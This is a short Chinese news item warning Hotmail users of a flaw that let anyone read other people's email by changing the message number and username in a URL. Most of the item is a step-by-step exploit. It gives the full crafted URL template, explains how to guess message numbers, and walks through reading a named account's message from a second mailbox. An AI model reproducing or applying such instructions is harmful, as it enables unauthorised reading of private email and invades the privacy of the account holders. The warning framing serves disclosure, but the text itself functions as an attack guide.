网友需注意:hotmail发现严重安全漏洞
爱白网讯 近日,一位hotmail用户发现,通过简单的更改地址中的邮件编号等信息就可以浏览它人的邮件内容。由于邮件编号都有一定的规则,所以很容易猜出来。要完成此项工作,你必须拥有2个hotmail信箱。
用于偷看他人邮件的地址为:
http://pv2fd.pav2.hotmail.msn.com/cgi-bin/saferd? _lang=en&hm___tg=http://64.4.36.250/cgi-bin/getmsg&hm___qs=&msg=msgxxxxxxxxx% 2e(x)x&start=1&len=99999999999&login% 3dusername&domain=hotmail.com
其中xxxxxxxxx为邮件编号,username为用户账号,(x)x为介于0和59之间的第二编码。
比如说,你有一个名为r00tarded@hotmail.com的信箱。首先登录此信箱,打开任何一封邮件,此时地址栏中的地址将是:
http://lw2fd.hotmail.msn.com/cgi-bin/getmsg?curmbox=f000000001&a=5691b2b
44e104176111971aa0fbb1274&msg=msg998000947.3&start=197078&len=1060&msgre
ad=1&mfs=182
这封电子邮件的编号就是msg998000947.3。把地址拷贝下来,注销。然后登录另一个信箱。把刚才的那封邮件的编号和账号插入地址栏:
http://pv2fd.pav2.hotmail.msn.com/cgi-bin/saferd?_lang=en&hm___tg=http:/%
2f64.4.36.250/cgi-bin/getmsg&hm___qs=&msg=msg998000947.3&start=1&len=99999999999&login% 3dr00tarded&domain=hotmail.com
回车。看到什么了?对,r00tarded@hotmail.com中的那封邮件的内容。
提请广大hotmail用户注意,此漏洞到本站发稿时为止仍未修复。